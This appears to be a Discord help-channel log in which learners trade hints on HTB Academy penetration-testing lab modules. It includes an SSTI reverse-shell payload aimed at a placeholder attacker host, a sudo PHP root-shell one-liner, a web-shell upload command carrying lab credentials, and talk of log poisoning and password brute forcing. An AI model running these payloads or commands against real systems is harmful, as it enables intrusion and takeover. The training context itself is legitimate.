#modules

1 messages · Page 8 of 1

zealous summit
#

is there an easy way to tell if its a docker

placid quest
#

maybe connecting to the docker

short brook
loud sapphire
#

Hello,

doing the final footprinting test. got into imaps and am trying to read the text of the email in inbox. nothing will display.... im lost. It worked in the example before the tests but not now.

#

can someone help me please?

shut orchid
#

Kl

#

@loud sapphirehey

loud sapphire
#

hi

#

sorry i didnt understand the request.

#

why would i want to hack a discord server? i just wanted some help with a command i dont seem to be imputting correctly...

#

sorry, i dont have time to look at that right now. i need to finish this problem up. I honestly dont know if i can hack discord lol. i am noob

loud sapphire
#

silence means vindication. Thank you. 🙂

short brook
#

@loud sapphire May I DM you?

loud sapphire
rustic sage
#

admin wanted to give you a suggestion

#

create a free conversation

loud sapphire
#

not even worth engaging. Until the next issue.

Thank you to those members who DM's to help me. all fixed now

tight mesa
#

hi, anyone who has finished Web Attacks module?

woeful oxide
#

Guys

#

Working on Server Side Attacks - skill assessment, could someone give me a hint ?

#

idk if it is too hard or I'm just stupid

tight mesa
#

did you checked the source code @woeful oxide?

vital adder
tight mesa
#

can I DM?

vital adder
#

sure

tight mesa
#

sweet

woeful oxide
tight mesa
#

im not sure if deobfuscation bug dig deeper

woeful oxide
#

Found this

vital adder
#

this is a bit too much spoiler so if you still have issue with that feel free to dm me

snow mirage
#

LINUX PRIVILEGE ESCALATION --- Miscellaneous Techniques

Review the NFS server's export list and find a directory holding a flag.

....I am truly stumped on what to do here. I ran the mount -t nfs <IP> /tmp/mnt

#

and I cant seem to find this flag, probably because I just don't have experience in using NFS in general

#

Im embarassed to say it, but I need help 😔

rustic sage
#

Hello, I am currently on Attacking Common Services - Easy. I got the username and password. I am struggling on uploading file onto \xampp\htdocs. I have tried various methods through the FTP. I cant figure out on what I am missing.

EDIT: latest ftp command:

ftp -u http://<usernmae>:<password>@10.129.98.89/xampp/htdocs/ file:////home/deafsnootz/Desktop/shell.php

Error: ftp: No file after directory (you must specify an output file) `http://fiona:987654321@10.129.98.89/xampp/htdocs/

Am I in the right direction? Thanks in advance! 🙂

rugged stag
#

[SOLVED] Having problems with the "Remote File Inclusion (RFI) section in the "File Inclusion" module. I'm following the exact steps from the lesson, the reverse shell gets called from the server (http as well as ftp), but the page gives me an error (see screenshot). I tried different ports on my end, respawning, but always get the exact same error. Anyone can make sense of this?

proven brook
#

Hello i need help please with the module Attacking Common Services - Hard i found the credentials for F*** and can login via rdp, but i can't login to the mssql server. Maybe i can dm someone for help ?

proven brook
#

Hmmm, i found 2 users on the server, but they both have no admin privilegs

proven brook
#

Found two more users in TestAppDB

delicate osprey
#

Hello i need help for command injection on module WHITEBOX PENTESTING 101: COMMAND INJECTION

#

i have the payload but i can't escape it 😦

placid quest
#

@delicate osprey try to use automatic tools

delicate osprey
placid quest
#

@delicate osprey what tool did you use

delicate osprey
#

i tried jq -aR .

rustic sage
#

Hi all, im working trough Login Brute Forcing - skills assesmet - website, and im trying to answer question nr 2. Can anyone give a nudge on what password list i shoud be using? I think i already found the use but it is taking forever using rockyou.txt

green turret
#

Hi, guys! I'm doing the Attacking Common Services module and I'm a bit stuck on the attacking SQL part. I already got the mssqlsvc password hash and crack it but I'm not quite sure how to enumerate the flagDB table. This server has only 2 users (htbdbuser and sa) and I can't impersonate SA. Can someone lend me a tip on how to approach it?

vital adder
vital adder
rustic sage
rustic sage
#

Guys hot up my rank in hack the box

dense ferry
rustic sage
#

thx FeelsBadMan

green turret
sturdy igloo
#

any assistance on Passowrd Attacks - Credential Hunting in Linux. Found Kira's SSH password and am in. Need to find Will's Password

rugged stag
#

Has anyone solved the File Inclusion Prevention exercise? They're giving 0 cubes for something that doesn't sound simple and I feel like the lesson explains nothing at all to solve this.

So, either I'm missing something here, or this is another case of where they expect you to either magically guess what a possible way to the solution could be, and if you miss it you spend up hours and hours and hours and hours and hours of your life going in the wrong direction. I've done enough of these, I'd like to know if there is a simple and straightforward solution to this that is indeed explained in this actual lesson.

vital adder
brazen saffron
#

Hello, what modules can I choose to start CTF?

versed wolf
#

I’m having trouble with Linux Privilege Escalation- Kernel Exploits module. I’m struggling with getting the exploit run in htb

placid quest
#

@brazen saffron all

sturdy igloo
vital adder
lunar elm
#

Hi, did you solve this exercise? Im having the same problem, the access.log stops logging when I change the user-agent to a the php execution code. Pretty sure its a bug, since there are videos doing that and it works for them. Please help 🙂 no sleep for the last 2 days.. 🙂

tropic raven
#

hello

#

can someone guide me?

#

im new

vital adder
vital adder
# tropic raven can someone guide me?

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...

▶ Play video
lunar elm
shadow willow
#

If you make the false req
The whole log will hang up and you have to restart the machine and hope for a changed Ip:Port 😂

lunar elm
rugged stag
#

Hi, have you been able to solve this by any chance?

rustic sage
#

Can anyone give a nudge on login brute forcing skill assesment - website question 2, i think i have the right syntax/fail in place but i am starting to doubt if i am using the wrong username.

rustic sage
languid dawn
#

Not the place to talk about that feelsBadLad

coarse flax
#

hello can you help me with the last section of fundamental windows with the first question which is "What is the name of the group that is present in the Company Data Share Permissions ACL by default?" I have already completed all the only thing missing is, please.

summer lava
#

please i need help on his

smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> 

#

i got access denied while trying to list dir

summer lava
#

password attack module

rustic sage
#

then you're logging in with the wrong user...

#

The right one should be fairly obvious!

summer lava
#

i'm using brute force

#

i got the first user

rustic sage
#

dm if you want to

summer lava
#

your reply indicates me to check for more result

#

i just saw another user

rustic sage
#

I found msf a lot faster for that particular scan

summer lava
#

yeah

#

i used msf

#

i saw upto five users

#

the last one have the accessible right

#

thanks

tardy yew
#

I started taking the Linux fundamentals module and im having a rough time learning all the commands. is there a step i need to learn before diving into linux or is it just my brainrot?

short brook
#

I'm also doing the linux fundamentals module right now. I find it easy to right down important commands on a notepad for later use. Practise the commands and you'll find them easy to use later on

west canopy
rustic sage
#

yeah, there are a LOT of commands in linux, the most important thing to remember is what you can do with commands, you can always look for the answer easily enough when you know what you are looking for

west canopy
#

and the Discord is here to help too 😉

short brook
#

Yess, We will always be here to help.😊

west canopy
#

Unfortunately, drilling Linux commands is not the most exciting or interesting thing in the world. But once proficiency is obtained, your world will open up

rustic sage
#

You can also run Linux within windows now with no need for a vm so that might give you more opportunity to practice. I would recommend going for debian if you plan to work with things like kali or parrot (don't try to use them as your AV won't like it!)
https://docs.microsoft.com/en-us/windows/wsl/install

tardy yew
#

when it ask to create the home directory for a new user using options.. what does it mean by options. is it other commands that i have to use to create a home dir?

#

again thank you for the help. it means alot being the only person in my family and friend group that loves tech makes it a lil more difficult but its not gonna stop me .

short brook
#

@tardy yew May I DM you?

tardy yew
west canopy
#

I was able to get the flag by ||eventually guessing the favorite color||

quasi gust
#

Did anyone submitted the flag for the final assessment of the sqlmap, and got rejected?

#

I found the flag but get declined

rustic sage
#

I haven't done that module, but check the flag is complete and that there's no spaces before or after it

quasi gust
#

there isn't

#

so strange - it's my final module RPOGGERS

vital adder
flat silo
#

How do I get around the 403 for the web proxies module for using burp as a web fuzzing tool. I've looked through the headers and I've inspected the page I don't see anything to lead me to rhe flag

sturdy igloo
#

anyone can help with password attack hard lab?

#

if so, let me know if i can dm. thanks

sturdy igloo
#

Which wordlists to use to crack the ||backup||

stray grove
sturdy igloo
stray grove
#

did you use ||bitlocker2john|| then ||grep "bitlocker$0"|| then use hashcat? it shouldn't take that long

vale salmon
#

I need a nudge on Pivoting, Tunneling, and Port Forwarding: Skills Assessment. I think I may be on the right track,but I'm 100% sure if I am following the right path to get there and I'm struggling a bit.

stray grove
#

which part?

vale salmon
#

The next to last question. Utilizing a common remote access solution to pivot. I got to the first Windows box with the credentials for ||mlefay||. I used ssh -D with ||webadmin|| and it's ||id_rsa||. From there I used ||proxychains|| to ||xfreerdp|| to the box. I was able to upload laZagne and get ||MS Cache|| hashes for ||admin|| and ||vfrank|| as well as other info. For the life of me, though, I can't figure out how to maneuver to the next system, which I am pretty sure is ||172.16.6.35||. Netsh doesn't seem to be doing it, nor do some of the other options.

sturdy igloo
stray grove
vale salmon
stray grove
vale salmon
#

Hmmm. I haven't tried ||SocksOverRDP||. Maybe that's it?

thorny beacon
#

ou

vale salmon
#

Nvm. That seems to not be working. It keeps disconnecting me from my RDP session.

thorny beacon
#

n

#

ñ

stray grove
#

if you've access to ||mlefay host||, you'll find he's connected to the other network, run a|| ping sweep|| from there you'll discover ||another host||, if you did get ||vfrank pass|| you need just to ||rdp|| to that host with the ||vfrank's creds||

slender jay
#

I know this is like 5 months off, but god dang i feel stupid. I connected to it previously, but was like nothings showing lmao. for future people remember hidden files im so embarassed

vale salmon
#

Ah right, so that's what I thought. Should I be trying to crack the ||MS Cache Hash|| for the pass for ||vfrank|| or am I overly complicating it?

stray grove
vale salmon
#

Ahh okay, thanks. I'll try that

stray grove
sturdy igloo
stray grove
west canopy
wide river
#

hi, im stuck at DNS footprinting, can anyone help with this , thank youuu
Image

quasi gust
rustic sage
wanton anvil
#

Hi I need help with linux escalation privlege htb academy training

heady hamlet
#

I have a huge problem with trying to work on a previous module. The LOGIN BRUTE FORCING module when i try and run hydra I keep getting "could not connect to ssh://<IP_ADDR>:22" **Specific IP address.

placid quest
#

@heady hamlet use cme tool it works prefect

rustic sage
little burrow
#

Hi everyone , i'm stuck in module File Inclusion , i was able to see the source of the website and i am trying to poison the Nginx access log with user-agent but it seems to fail , can anyone suggest me ?

hallow otter
#

Have you tried to poison the session and access the session file then?

#

Remember that you have to do it twice, first command then you read then another command, because the previous one overwrites the other

balmy moon
#

Good Morning good people!! Can I get some help with Information Gathering - Web Edition/Active Subdomain Enumeration? I'm having trouble getting the FQDN of the nameserver inlanefreight.htb

hollow hinge
acoustic owl
balmy moon
#

Thanks @acoustic owl!

rustic sage
#

Anyone can help me with uploading file to that certain directory on Attacking Common Services - easy?

EDIT: I managed able to write that directory. Unable to execute the reverse shell. Progress made...

flat silo
#

How do I get around the 403 for the web proxies module for using burp as a web fuzzing tool. I've looked through the headers and I've inspected the page I don't see anything to lead me to the flag

upper willow
#

thanks

#

any hackers from India

twin gulch
#

Hey everyone

#

Is windows privilege escalation Vpn down?

#

It’s going through fatal error somehow

west canopy
west canopy
edgy ridge
edgy ridge
# edgy ridge

i get this error when trying to load shellcode with python in binary exploitation. can anyone help

quasi gust
foggy light
#

Is doing writeup for academy permissible?

#

@high zinc

west canopy
light epoch
#

Hello, I am doing the basics academy modules and found a privilege escalation method that I don't understand

#

Can someone explain it to me? it gives you root access with meterpreter

#
shell
sudo -l
CMD="/bin/sh"
sudo php -r "system('$CMD');"
west canopy
#

sudo -l is used to check sudo permissions , which reveals we can run the php binary as sudo

#

CMD="/bin/sh" we are just setting an environmental variable

#

the final command we use sudo to run php as the root user, and specifically we use php to run a bourne shell ("/bin/sh")

#

essentially just spawning a root shell for us.

light epoch
#

Thanks, I understand it perfectly now

west canopy
#

@light epoch

light epoch
#

Using sudo php -r "system('/bin/sh');" would work without setting the env variable?

west canopy
#

yes i believe so

#

i don't see why it wouldnt 😉

#

of course we could always test to confirm

light epoch
#

don't worry, ty

placid quest
#

@west canopy do you think we will get some module s in the future or

iron basin
#

Anyone mind helping me clarify some stuff on the footprinting academy module, specifically the dns enumeration questions?

west canopy
placid quest
#

@west canopy wow 👌

iron basin
west canopy
#

My understanding of what's going on under the hood is kind of fuzzy but I more or less get how it works. If the first zone transfer is successful you can pretty much|| do the same thing again, just trying zone transfers against all discovered subdomains||

west canopy
#

Obviously we can't stop you from making or distributing write ups for other modules

#

so if you go that route do us a favor and try to make them as educational as possible

flat silo
#

So I figured out how to add .html to each search word but is there a better/shorter list then the seclists common.txt

west canopy
#

i think common.txt is one of the shorter lists too right?

flat silo
#

I'm not sure I can Google it everything I've tried it I get to about 200 words in and it starts to error put on me

high zinc
flat silo
#

Admittedly this is the first time a properly set it up to add the .html to each entry so maybe it's just best to let it do its thing it just seems so slow bc of burps throttling I prefer gobuster

light epoch
foggy light
#

My class is struggling with the linus prevesc module. So i was thinking about making a write up for it and upload it in my website. @high zinc

high zinc
#

Ah i see

light epoch
foggy light
#

Our class have 40 student. Im the only one who solved the whole thing. And even i struggled lol

#

I just checked its tier2... so bo writeups

west canopy
#

I remember being stuck on that module for three weeks because of the Privileged Groups section. Don't tell anyone but I might have actually|| bought the module for a friend ||just so he could help me work through it and finish it

foggy light
#

Privileged group and the last section.
This are the main modules people are suffering the most.
Other sections as well too

foggy light
rustic sage
#

best meme

naive ravine
#

Hi I was wondering if someone managed to get a reverse shell for the SSTI Example 3 Section, via the command showed in the section itself: {{''.class.mro[1].subclasses()214._module.builtins'import'.popen('python -c 'socket=import("socket");os=import("os");pty=import("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<PENTESTER_IP>",<PENTESTER_PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'').read()}}

west canopy
coarse flax
#

Hi, I have a problem with the last section of the windows fundamentals module which is "What is the name of the group that is present in the company data sharing permissions ACL by default?" I tried everything creating a group that I am asked to search for all the groups with commands and also in computer management and nothing.... please help me I have been trying everything for several days.

coarse flax
proven brook
#

good evening, i need a hint or help please. At the moment i'm working on Pivoting, Tunneling, and Port Forwarding | Skills Assessment. I'm struggeling with Question 6 and i think i'm in a while(1) that takes forever. Because i found a Linux server where i can login via ssh. on the Server i found a second network ||172.16.5.15||. I pivot through the linux server via proxychains and rdp on ||172.16.5.35|| with ||mlefay||. Then on the Windows server i found another network ||172.16.6.35|| and i can login via rdp from ||172.16.5.35|| with ||vfrank||. and now im stucked, all the flags on both windows server are the same, i found about 4 flags per server and the are all the same like ||single-piv-blablalba||. Thanks for a hint. I looks like they are both connected with no way out

proven brook
#

would be nice if i can dm someone

rustic sage
#

OMG! Attacking Common Service - Assessment medium is SUPER EASY! I Don't understand why the easy assessment is so hard!

vital adder
vital adder
edgy ridge
rustic sage
snow mirage
#

@foggy light hey cutie

vital adder
proven brook
edgy ridge
flat silo
#

Hey so I'm on the web proxy module doing the burp intruder section I amended my request to include the .html at the end of each search I'm using the common.txt from seclists the scan is taking too long and the machine shuts down. Is there a way around this a small word list maybe? I did get a few pages throwing a 403 code should I look at those and see if I can manipulate the headers some how

proven brook
#

because on both machines the ipconfig table looks exactly the same

vital adder
#

oh that's weird

proven brook
#

but the rdp session says that i'm definitly on two different networks

vital adder
#

try restarted your target machine if you still have this weird issue shoot me a dm i'll help you troubleshoot

proven brook
#

once 172.16.5.35 and once 172.16.6.35 i mean i don't now the subnet mask yet but thats something i should check

proven brook
vital adder
proven brook
#

and i tried one more thing, i can create on user ||vfrank/172.16.6.35|| desktop a file and it will show up on ||mlefay/172.16.5.35|| in the vfrank path

west canopy
vital adder
proven brook
vital adder
#

sure

#

anyone else got the new pwnbox this look like it's still in beta

delicate needle
#

it looks like some one shot that bird

#

gut shot with a slug

#

That's a dope parrot bg

vital adder
#

the theme look great but firefox are missing something

delicate needle
#

It's a beautiful looking OS.

feral stump
#

Looks pretty cool

#

Haven’t checked though

vital adder
#

cool but buggy (so far burp only)

delicate needle
#

No, I haven't, either. I'm a Kali guy. I'll get around to it eventually.

delicate needle
#

The HUD is really nice.

feral stump
delicate needle
#

and it's open source.

#

If you can afford the full version of burp though

vital adder
delicate needle
#

Yeah haha same .

#

I love burp

vital adder
#

me too

delicate needle
#

It's just so stable and clean

#

simple interface

#

the documentation is on point.

vital adder
delicate needle
#

Not clunky

delicate needle
feral stump
#

Is there any special feature in ZAP that burp doesn’t have ?

delicate needle
#

but you could probably do that in burp

#

Well not probably you definetyl could.

vital adder
delicate needle
#

It's hard for me to gauge software these days; my computer is a beast.

#

So i'll have to take your word for that.

#

we should probably take this conversation to a different channel though

vital adder
#

also the new burp for the pwnbox you can't use it with the small pwnbox screen you have to use full screen which is a bit annoying

delicate needle
#

We're going to get in trouble for being off topic

feral stump
#

Yeah 🤣🤣

vital adder
#

yep

feral stump
#

Good chat though

delicate needle
#

yeah 🙂

feral stump
#

See you around fellows

delicate needle
#

^ cant even post gifs

west canopy
#

i know, we run a tight ship here

tame bolt
#

😆

red kayak
#

Can someone direct me to information about how to log in and spawn a system IP from a remote server without a GUI??? lynx isn't providing the button for spawning. So I can't run the slower pw-cracking methods on my fast server. NO GPU at home!!!

woeful oxide
#

Hey guys

#

Someone can give a hand with the Broken Authentication - Default Credentials?

#

idk if I need to use Hydra

west canopy
red kayak
#

so perhaps jarednexgent is implying "default credentials" might indicate - follow the advice given in the module and "Take the most obvious guess"... heh...

west canopy
#

also if we ||right click in firefox and view page source|| we can find some useful information

loud sapphire
#

heya. doing the Using Web Proxies assessment. The 31 char cookie part.
I need to generate a list of potential cookies (32 chars long) using my 31 char captured cookie as a base.

Whats the best/easiest way to generate the list? I am missing something easy here.....

vital adder
#

i use the Payload Processing thing in burp intruder

loud sapphire
#

the processor will be used to encode it all back up only tho?

Can i make the processor generate the list and then code it all back up?

vital adder
#

no idea what you mean but in burp Payload Processing you can add the single wordlist payload to the first 31 char of the cookie and encode them all

loud sapphire
vital adder
#

sure

woeful oxide
#

I've been overthinking it haha

west canopy
vital adder
#

at one point i almost did that too, the burp Payload Processing thing is so confused

loud sapphire
#

i think im winning

woeful oxide
#

It was in front of my eyes

loud sapphire
candid summit
#

Hello someone can give me a hint for the exercise "Work on webapp at URL /question2/ and try to bypass the login form using one of the method showed. What is the flag" in BROKEN AUTHENTICATION module. I modified the python script different ways and i cant get it, also i modified the X header

west canopy
candid summit
rustic sage
#

Hi all, im currently doing the linux fundamentals, i was hoping to get some advice on what the "format" of the answers need to be in

#

For the following question:
||What is the path to the htb-student's mail?||
I use the following command
||env | grep mail||

#

||MAIL=/var/mail/htb-ac588612||

#

im pretty sure this output contains the answer but can't seem to put it in a format that seems to work?

#

anyone know if im doing something really dumb?

west canopy
#

looks like you are currently running the command from PwnBox

rustic sage
wide river
#

helppppp, im stuck at DNS footprinting. can anyone help what to do

ancient prism
#

hello

nova thistle
#

is there any solution to gobuster dns -d command being incredibly slow?

quasi moth
#

Can someone explain what this thing is?

  • CPE credits submission
sage jackal
#

Hello 👋🏻 Windows Privilege Escalation Module; Interacting with Users section… The techniques in this section aren’t very clear and can’t make them work to obtain the answer for the question, any help?

sage jackal
twin gulch
sage jackal
# twin gulch Well, where do you need help?

On the section’s question which asks for the sccm_sec password, also I wasn’t able to replicate the responder part of the section but I’m not sure if it’s related

faint trellis
#

Hey Guys, who can hint me Windows Privilege Escalation Skills Assessment - Part II - 2nd Question?
I have enumerated vulns but they are to many. Also, I tried follow examples from the module but have no luck.

summer lava
#

hi

pine dagger
#

Good afternoon! Question on Attacking Common Services - Hard. I'm on the RDP, but can't access the SQL server. I've tried all the combinations of credentials but still not having success. I've tried with sqlcmd and using studio. Is there something obvious I'm missing? 😦
Nevermind, I realised that studio was pointing at the wrong server

short brook
#

Hi @hearty walrus , please note that we do not discuss that on this server as it can cause serious damage to the server you are trying to hack into. If you wanna learn hacking, please only hack the machines provided on the htb website. Rule nr 1 of hacking: If you do not know how to do it, then you don't have the permission to do so. Kind regards, thecyberteam

novel matrix
short brook
haughty jay
#

Hi, can anyone give me a hand at Skills Assessment - File Upload Attacks? I'm stuck

haughty jay
#

I did it

pine dagger
#

Ohhhh yeah, finally finished Attacking Common Services. That was an exercise in frustration, but definitely worth it.

brazen saffron
#

Uh why?

#

When I do a GET request I get it.

#

Nvm, I guess it's because I did not add the last "/" at the end of the URL.

glossy maple
#

anyone having trouble accessing the user ||fiona with the correct password on sqsh|| on attacking common services - hard lab. i was about to take some notes, but now i cant access it. Can anyone confirm it is not just me 😓 nvm! i reset the server, its working now

twin gulch
#

Hey guys. I’m at passwords attacks on network services part. Trying to find the winrm username and don’t have any clue where to start. I was thinking bout using nmap and dig some info and got user named WINSRV, but I think I’m misleading, cause didn’t got any pass with crackmapexec (used rock you files and some more), any ideas?

twin gulch
#

Trying to brute +userlist

west canopy
#

for this module there is a provided username and password list we will need to use

twin gulch
#

How did I missed that;)

#

Lol

mellow turtle
#

F

rustic sage
#

Hey, I am stuck in skills assessment - wordpress, i started the machine, ran nmap, dirbuster and wpscan but i can't find any wordpress directories any help?

placid quest
#

@rustic sage did you look on all links because one link has WordPress

wide river
#

hi, it's me again with the DNS footprinting, i finally solved the first question, but i cant find the answer for the last one, any hint?

rustic sage
#

@placid quest from the gobuster output I checked them all

feral stump
wide river
#

oh ya, i got some of it but i cant find the one with octet 203

placid quest
#

@rustic sage not on gobuuster look at the form of the website it has some links and one link has the WordPress you will need to add it in /etc/hosts

rustic sage
#

@placid quest oh ok thx

west canopy
rustic sage
#

Thx i got it

tepid hemlock
#

What exactly do these days mean?

brave prawn
tepid hemlock
#

I thought so too, but based on what 😄

#

8 hours a day?

#

or maybe amount of content it has

twilit cipher
#

Anyone finish the Web Attacks module I can bounce some ideas off of?

vital adder
wide river
#

hi, im at SMTP footprinting. How can i find user in it?

vital adder
#

use metasploit

wide river
#

the module dont talk about metasploit

#

just telnet, HELO, EHLO, and nmap

vital adder
#

i think you can use that but metasploit is faster

wide river
#

ok, im spawning target and tryna use it

flat silo
#

Hey so I'm on the web proxy module in the ZAP fuzzed section. I've found the cookie I found what it's hash equal but I can't figure out how to set up the fuzzer so it actually uses the cookie. I've highlighted and right clicked it and selected fuzz but it just brings up my request header.

vital adder
#

first don't set the threads too high and you need to use the given wordlist

placid quest
#

@wide river change the list of use names

wide river
#

ok, imma set THREADs back to 1 and change new wordlists and see what happen

vapid grove
#

Hi, anyone has any idea on how to fix this? It should be as straightforward as it looks i guess..

vital adder
#

nope and also that's weird try turning on the verbose

wide river
#

command is exploit -v right?

vital adder
#

nope it's set verbose true

wide river
#

it running, give me couple sec

#

hah XD?

vital adder
#

wait what wordlist is that?

wide river
#

from the seclist

vital adder
#

no use the given one

wide river
#

the one already in the metasploit?

vital adder
#

nope the one in the Resources

vital adder
flat silo
#

Thank you but it is for the zap section I just got through the burp part last night

vital adder
#

yeah i did every section in that module with both burp and zap but i forgot this section in zap so i'm trying it right now

flat silo
#

I just don't understand how to feed the cookie into the fuzzer I can't modify the header to include it and use it as the attack position I feel like that's the goal

vital adder
#

in burp it's so much easier to use intruder

wide river
#

oh, ignore the tag mesage

#

wrong one

flat silo
#

I'll respin my ma hine and try burp I just wanted to try and do it with zap learn what the goals are. I figured out the hash value by just manually feeding the wordlist through the decoder is there a way to just use that info to directly get the flag I tried feeding it into the url but just got a 404

vital adder
#

that list have 101 word why did your end so quick?

vital adder
wide river
#

i do nothing XD

vital adder
wide river
#

i did that, which is what you see in the picture lol

#

the whole thing i do was

#

show smtp_enum

#

use 0

#

set RHOSTS

vital adder
#

oh wait what so is just stop?

wide river
#

set USER_FILE

west canopy
#

and let me know if it works

wide river
vital adder
vital adder
wide river
#

ok, so can you show me how to do it with HELO, EHLO, VRFY

#

basically stuff in the module?

vital adder
#

nope i use metasploit

#

so don't know how to do that

#

yep that one

wide river
#

imma just restart the whole machine and try it again

#

thank you so much

autumn pilot
#

careful with the spoilers

rustic sage
#

does anyone have hacks for btd battles

wide river
#

hi i have question in the module POP3/IMAP. It ask for the organization and i use NMAP to find the result as you see in the picture, but the answer is incorrect, can anyone tell me what i do wrong?

lyric echo
#

Hey can someone assist me with Web Service & API Assessment? I have gained asses via SOAP execute command, but am unsure if this is the correct path or where to go next.. Thanks

wide river
#

also, how to dela with the last 2 questions XD?

robust drift
#

alguien que haya hecho modulo broken authentication help please

thorny stag
#

hey, i have a question, how do i level up and stop being a noob? I'm doing the beginner's part and I went to the second stage, but there was no progress...

lyric echo
#

Hey can someone assist me with Web Service & API Assessment? I have gained asses via SOAP execute command, but am unsure if this is the correct path or where to go next.. Thanks

pine dagger
#

Wooohoo! Footprinting done!

wide river
pine dagger
#

Thanks 🙂

livid pier
#

Hey im working on the pivoting forwarding and tunneling module, the RDP and SOCKS Tunneling with SocksOverRDP section says to use proxifier, but the site is down, anybody overcome this?

placid quest
#

@thorny stag practice more

lyric echo
#

Hey can someone assist me with Web Service & API Assessment? I have gained asses via SOAP execute command, but am unsure if this is the correct path or where to go next.. Thanks

light epoch
lyric echo
faint trellis
#

Hi everyone!
Who was succeded to make CVE-2020-0668 Attack from the Kernel Exploits section of the Windows Priv Escalation module?
Where did you get UsoDllLoader.exe / diaghub.exe?

lime turret
#

Any tamil people to play HTB together?

rustic sage
#

Can somebody help me with the Type Filters section of the File Upload Attacks module, i managed to upload the file but i'm getting: cannot be displayed because it contains errors.

rustic sage
rustic sage
#

++identify

#

hey guys... is this the right place to seek help with modules on HTB Academy?

vast geyser
#

Hello, I am stuck on SERVER-SIDE ATTACKS of SSTI Exploitation Example 1,I can't find the hidden flag,Could someone give me hint? thanks

brazen saffron
#

I am trying to do the banner grabbing but I do not get it.

rustic sage
rustic sage
#

guess I'm in the right place... If someone could help me, give me a hint, I would much appreciate it. I'm on File Inclusion (fundamentals), module 23/section253... I have gained RCE through PHP Input Wrapper... the flag should be at / , yet http//IP:PORT/...&cmd=/ does not show anything, while &cmd=id i do get uid=33(www-data)... cmd=pwd i get /var/www/html... any help on this would be highly appreciated

thorny stag
rustic sage
vast geyser
placid quest
#

@thorny stag Everything takes time

brazen saffron
rustic sage
#

I don't get tplmap installed on a Ubuntu VM.

balmy moon
#

Good morning good people. Can I get some help with running fierce. I can't seem to get it working.

fierce: error: unrecognized arguments: -dns inlanefreight.htb -wordlist /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt

acoustic owl
rustic sage
vast geyser
rustic sage
#

python2.7 -m pip install -r requirements.txt

vast geyser
#

you can execute python command to check the python version , because pip also may be in python3

rustic sage
#

Default is Python3

vast geyser
#

Yes,that is the reason

rustic sage
#

I forced my machine to install it with Python2.7

#

But same problem

vast geyser
#

So,you can create a virtual python2 environment

#

then install the tool in virtual environment

rustic sage
#

okay, I will tryu

vast geyser
barren minnow
#

I wanna join a learning team

thorny stag
#

@placid quest could you teach me how to hack a website? or indicate a site/test to train? or something like that?

thorny stag
pine dagger
#

You mean... besides Hack the Box?

brazen saffron
#

uh why?

pine dagger
brazen saffron
#

Yeah but, I have not the version.

pine dagger
#

Because it got filtered.

pine dagger
#
filtered
Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. These ports frustrate attackers because they provide so little information. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common. This forces Nmap to retry several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically.```
brazen saffron
#

So what can I do to know the version?

pine dagger
#

No idea, which module/exercise are you doing?

brazen saffron
#

"Getting Started".

pine dagger
#

best thing to do when asking for help here is to start with that, and then problem

brazen saffron
#

Service Scanning.

pine dagger
#

I'd possibly check the IP address is correct.

#

I just tested it, and you should get an open port.

#

Assuming you are using pwnbox

brazen saffron
#

Can I dm you?

charred parcel
#

hey guys noob here, am trying to solve the http rdownload with curl but it dosent to seem to work
curl -s -0 http:/[ip]:[port]/download.php
used this command

brazen saffron
robust drift
#

could help me with module broken authentication give me hit please

brazen saffron
jagged radish
robust drift
#

help me modele broken authentication please

flat silo
#

Morning guys I'm on the web proxy module working through the zap scanner section I've identified the vulnerability I'm using cat to call the .txt file but just getting a blank page nothing when I inspect it or the headers. Can anyone point me in a direction?

safe adder
acoustic owl
#

What is this rank?
From the Academy? Or from HTB?

elder zenith
#

Hi I have a question. I searched for vulnerability CVE-2021-4034. i used msfconsole, however, i don't know how to get the session id on the attacked hoset (reversed shell). Does anyone have an idea how to do this?

safe adder
#

From the Academy. It's a module on PrivEsc on Windows.

west canopy
livid pier
#

The home stretch

acoustic owl
acoustic owl
livid pier
#

lol bro i have been stuck for weeks, slow slow progress

#

lol its just the final bosses left

jagged radish
acoustic owl
livid pier
#

midday tho, morning are for music🥳

acoustic owl
leaden quail
#

hey guys, i need some help on the easy footprinting skill assessment

#

when i try to connect to the ftp server with the pwnbox i got this error:

#

on my kali vm i can connect but got wired messages when i try execute commands

#

And when i try to download the files with wget the directory is empty

#

not sure whats going on there 😄

sharp eagle
#

is there any video explanation available for a certain module

sharp eagle
#

man..

acoustic owl
flat silo
#

Morning guys I'm on the web proxy module working through the zap scanner section I've identified the vulnerability I'm using cat to call the .txt file but just getting a blank page nothing when I inspect it or the headers. Can anyone point me in a direction?

unborn mauve
#

is parrot ternimal the bash terminal?

rustic sage
# leaden quail

I normally interact with ftp with the following command: ftp 10.129.227.16

#

After it can connect, it will ask for creds

flat silo
#

Do I need to search somewhere other then ping.php I've tried just searching for the txt file that way but get a 404, I've looked in the etc/ I get blank pages. I'm just not sure where to direct the search at this point

terse wave
#

does anyone know how to write in community strings for braa? I found the one i needed but i dont know the correct way to write it out. i know thats its <community string>@IP but I'm not sure which part to put in

shut orchid
#

are you training?

terse wave
#

if you mean doing academy footprinting module

shut orchid
#

yes

terse wave
#

yeah

#

i got an output from onesixtyone for a community string as per the module, but it doesn't say what the correct way to write it in is and any way i try doesn't seem to work

shut orchid
#

ask someone experienced

#

a chinese hacked me what to do

vapid grove
#

Hi, can i get a nudge on windows privilege escalation skills asessment 1? I have tried all exploits on windows exploit suggester, but no one seems to elevate my privileges..

rustic sage
#

++ identity

edgy ridge
#

i get the above error when running pwn shellcraft amd64.linux.sh -r. I'VE been stuck on that for 3 days now helpppppp!😭

sturdy igloo
#

